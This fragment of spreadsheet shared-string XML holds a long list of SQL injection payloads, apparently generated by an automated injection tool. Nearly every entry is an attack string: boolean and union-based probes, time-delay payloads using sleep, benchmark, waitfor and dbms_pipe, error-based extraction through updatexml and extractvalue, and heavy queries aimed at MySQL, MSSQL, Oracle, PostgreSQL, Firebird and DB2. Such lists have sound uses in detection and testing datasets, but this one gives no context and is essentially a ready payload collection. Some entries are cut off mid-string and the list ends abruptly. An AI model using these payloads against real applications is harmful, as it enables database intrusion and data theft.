  <si>
    <t>-4379' union all select 1648,1648,1648,1648,1648,1648,1648#</t>
  </si>
  <si>
    <t>-5031' or 9323 = 9323#</t>
  </si>
  <si>
    <t>1  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 'osov' like 'osov</t>
  </si>
  <si>
    <t>1 )  and 2006 = 2006</t>
  </si>
  <si>
    <t>-2373%" )  or 9323 = 9323#</t>
  </si>
  <si>
    <t xml:space="preserve">-4637' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>1" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "fvtu" like "fvtu</t>
  </si>
  <si>
    <t>-2174'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'dyyg' = 'dyyg</t>
  </si>
  <si>
    <t>1'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'nqam' = 'nqam</t>
  </si>
  <si>
    <t>1"  )  )   as dooi where 1806 = 1806 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-8331' )  union all select 1452,1452,1452,1452,1452--</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-8976%"  )  )   )  union all select 5146,5146,5146,5146,5146,5146,5146,5146--</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( 'ywnm' = 'ywnm</t>
  </si>
  <si>
    <t>select  ( case when  ( 2294 = 3651 )  then 2294 else 2294* ( select 2294 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'ireg' like 'ireg</t>
  </si>
  <si>
    <t>1'+ ( select eztr where 4260 = 4260 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>1"  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'+ ( select 'epza' where 8994 = 8994 and make_set ( 3782 = 2428,2428  )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 )  where 1100 = 1100 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1' and elt ( 3247 = 3969,3969 )  and 'xcbm' like 'xcbm</t>
  </si>
  <si>
    <t>1 )  and  ( 2342 = 3620 ) *3620</t>
  </si>
  <si>
    <t>1" where 1537 = 1537 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) -- tzry</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( 'sqzl' = 'sqzl</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3# sfup</t>
  </si>
  <si>
    <t>1"  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "ycuo" like "ycuo</t>
  </si>
  <si>
    <t>-4885 union all select 4589,4589,4589,4589,4589,4589,4589,4589,4589,4589#</t>
  </si>
  <si>
    <t>1" or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-1639  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||c</t>
  </si>
  <si>
    <t>-3059' )  as jhbh where 4056 = 4056 or  ( 3498 = 6965 ) *6965--</t>
  </si>
  <si>
    <t>select case when 4488 = 5522 then 1 else null end--</t>
  </si>
  <si>
    <t>1'  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  'zjel' like 'zjel</t>
  </si>
  <si>
    <t>1'+ ( select xruo where 5709 = 5709 and 7533 = 7533 ) +'</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #</t>
  </si>
  <si>
    <t>1"  )  )   and sleep ( 5 )  and   (  (  "lied" like "lied</t>
  </si>
  <si>
    <t>-3634%'  )  )   or 2671 = 2434</t>
  </si>
  <si>
    <t>1" )  as jidc where 6093 = 6093 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 )  as imdt where 6431 = 6431</t>
  </si>
  <si>
    <t>1"  )  )   and 8329 = 5584#</t>
  </si>
  <si>
    <t>-1432"  )  )   union all select 9008,9008,9008#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-4542'  )  )   order by 1#</t>
  </si>
  <si>
    <t>1%' and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 where 2956 = 2956</t>
  </si>
  <si>
    <t>1%"  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-9062" or 6872 = 6872 and "aumq" like "aumq</t>
  </si>
  <si>
    <t xml:space="preserve">1" rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'mwpd' where 2887 = 2887</t>
  </si>
  <si>
    <t>1  )  )   as xovu where 4530 = 4530 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1" )  where 9115 = 9115</t>
  </si>
  <si>
    <t>1 and 9198 = 9198--</t>
  </si>
  <si>
    <t>-1641' union all select 4835#</t>
  </si>
  <si>
    <t>1' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'obax' like 'obax</t>
  </si>
  <si>
    <t>1%"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'jfir' where 7814 = 7814 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>-5196"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1 and  ( 5369 = 8325 ) *8325# psze</t>
  </si>
  <si>
    <t xml:space="preserve">call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>1 )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' union all select null--</t>
  </si>
  <si>
    <t>-9355' or  ( 8459 = 8459 ) *4906 and 'aegf' = 'aegf</t>
  </si>
  <si>
    <t>1'  )  )   and 4650 = 1322#</t>
  </si>
  <si>
    <t>if ( 5127 = 2829 )  select 5127 else drop function okos--</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  where 5850 = 5850 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' )  as dajk where 1452 = 1452 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1" )  where 8390 = 8390</t>
  </si>
  <si>
    <t>1%" )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 9474 = 9474</t>
  </si>
  <si>
    <t>1'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'dfsj' = 'dfsj</t>
  </si>
  <si>
    <t>1' where 1628 = 1628</t>
  </si>
  <si>
    <t>1" where 4684 = 4684 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1%" )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   as vzso where 8541 = 8541 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'vabj' where 7178 = 7178 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'+ ( select 'rpds' where 5870 = 5870 and 4595 = 4595#</t>
  </si>
  <si>
    <t>-3872%"  )  )   )  union all select 1637,1637,1637,1637,1637#</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9653' )  where 2705 = 2705 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1" or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  where 1270 = 1270 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9015%" )  union all select 6948,6948--</t>
  </si>
  <si>
    <t>-7678  )  )   )  union all select 2622,2622,2622,2622,2622,2622,2622,2622--</t>
  </si>
  <si>
    <t>1"  )  )   as pqbs where 4409 = 4409</t>
  </si>
  <si>
    <t>1" )  as pxdq where 2236 = 2236 and 2006 = 2006</t>
  </si>
  <si>
    <t>-9152"  )  )   as avga where 3825 = 3825 order by 1#</t>
  </si>
  <si>
    <t>1 )  as bzuh where 8041 = 8041 and 6307 = 9200#</t>
  </si>
  <si>
    <t>1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) -- slje</t>
  </si>
  <si>
    <t>1'|| ( select 'vasx' where 4770 = 4770 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>-9673 )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>-6520%" )  order by 1#</t>
  </si>
  <si>
    <t>-6200'  )  )   as jjpz where 4490 = 4490 union all select 4490,4490,4490,4490,4490,4490,4490,4490,4490,4490--</t>
  </si>
  <si>
    <t>1%' and 2006 = 2006</t>
  </si>
  <si>
    <t>1%" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' and elt ( 4249 = 4249,7259 )  and 'nsbj' like 'nsbj</t>
  </si>
  <si>
    <t>1'+ ( select 'mtpt' where 7483 = 7483 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>-3151%"  )  )   )  union all select 6250,6250,6250,6250,6250,6250,6250,6250,6250,6250#</t>
  </si>
  <si>
    <t>1'|| ( select 'nbmo' from dual where 5572 = 5572 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-4807' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t xml:space="preserve">1 rlike  ( select  ( case when  ( 8314 = 5463 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1 )  where 4548 = 4548 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1'+ ( select 'pvej' where 4496 = 4496 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   )  and 7533 = 7533 and   (  (   ( 7740 = 7740</t>
  </si>
  <si>
    <t xml:space="preserve">1"  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) </t>
  </si>
  <si>
    <t>1' and 2316 = 7236</t>
  </si>
  <si>
    <t>1 )  as ywrn where 1893 = 1893</t>
  </si>
  <si>
    <t>-2046' )  union all select 6668,6668--</t>
  </si>
  <si>
    <t>-1662 where 1119 = 1119 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>select * from generate_series ( 5980,5980,case when  ( 5980 = 5063 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' )  where 5287 = 5287 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'vvxk' = 'vvxk</t>
  </si>
  <si>
    <t>-8716' )  where 5523 = 5523 or 3686 = 8485--</t>
  </si>
  <si>
    <t xml:space="preserve">-7452 where 2224 = 2224 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>-7848%" union all select 1580,1580,1580,1580,1580,1580,1580--</t>
  </si>
  <si>
    <t>-8042 )  as zhoq where 2120 = 2120 union all select 2120,2120,2120,2120,2120,2120,2120,2120,2120,2120--</t>
  </si>
  <si>
    <t>-7482"  )  )   )  or 9077 = 2651</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( 'eiau' = 'eiau</t>
  </si>
  <si>
    <t>-5313'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 6312 = 6312</t>
  </si>
  <si>
    <t>1" )  as ybkp where 7788 = 7788 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t xml:space="preserve">-2374 )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  </t>
  </si>
  <si>
    <t>1 )  as auly where 4146 = 4146 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   and 7533 = 7533 and   (  (  'pagc' like 'pagc</t>
  </si>
  <si>
    <t>1'+ ( select myci where 8903 = 8903</t>
  </si>
  <si>
    <t>-7258" )  as wjjr where 2110 = 2110 union all select 2110,2110,2110,2110,2110,2110,2110,2110,2110--</t>
  </si>
  <si>
    <t>-2876" )  or make_set ( 5306 = 6127,6127 )  and  ( "urjm" = "urjm</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and 'rfgj' like 'rfgj</t>
  </si>
  <si>
    <t>-5258 )  or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'plfa' = 'plfa</t>
  </si>
  <si>
    <t>1%'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> end# thjv</t>
  </si>
  <si>
    <t>1" )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "rkfk" like "rkfk</t>
  </si>
  <si>
    <t>1'|| ( select 'nwve' where 7721 = 7721</t>
  </si>
  <si>
    <t>1%" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1%" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'ebuo' = 'ebuo</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-6567'  )  )   union all select 3217#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( 8362 = 9139 ) *9139</t>
  </si>
  <si>
    <t>1" )  where 2016 = 2016 and  ( 1547 = 2093 ) *2093--</t>
  </si>
  <si>
    <t>1' )  where 7279 = 7279 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'wvio' from dual where 8934 = 8934 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 8113 = 8981 )  then 8113 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' or sleep ( 5 ) </t>
  </si>
  <si>
    <t>-3059 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +</t>
  </si>
  <si>
    <t>1'+ ( select byor where 4538 = 4538</t>
  </si>
  <si>
    <t>1' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( 'qbdm' = 'qbdm</t>
  </si>
  <si>
    <t>-1915%"  )  )   union all select 7732,7732,7732,7732,7732,7732,7732,7732,7732#</t>
  </si>
  <si>
    <t>select  ( case when  ( 4393 = 2875 )  then 1 else 4393* ( select 4393 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and 'hyun' like 'hyun</t>
  </si>
  <si>
    <t>1'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  'vedm' = 'vedm</t>
  </si>
  <si>
    <t>1' where 8083 = 8083 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>-7006' where 6966 = 6966 union all select 6966,6966,6966,6966#</t>
  </si>
  <si>
    <t>1  )  )   as xvyi where 6701 = 6701 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>-9893' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>-7036%' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 9514 = 8668,8668 )  and   (  (   ( 'sgjj' like 'sgjj</t>
  </si>
  <si>
    <t>1" where 3434 = 3434</t>
  </si>
  <si>
    <t>1'  )  )   and sleep ( 5 )  and   (  (  'tcwt' = 'tcwt</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and 'fjpf' like 'fjpf</t>
  </si>
  <si>
    <t>1'  )  )   as ewsw where 4667 = 4667 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-3979' in boolean mode )  union all select 4911,4911,4911,4911,4911,4911,4911,4911,4911,4911#</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 'npzh' = 'npzh</t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( 8610 = 2985 ) *2985#</t>
  </si>
  <si>
    <t>1" )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "lsca" like "lsca</t>
  </si>
  <si>
    <t>1" )  as kzuq where 4259 = 4259</t>
  </si>
  <si>
    <t>1%'  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'qued' where 9801 = 9801 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 )  where 8338 = 8338 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-4184'  )  )   )  or 2579 = 4654#</t>
  </si>
  <si>
    <t>1" )  as yggn where 1006 = 1006 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1 )  where 2940 = 2940</t>
  </si>
  <si>
    <t>-2359' union all select 2687,2687,2687#</t>
  </si>
  <si>
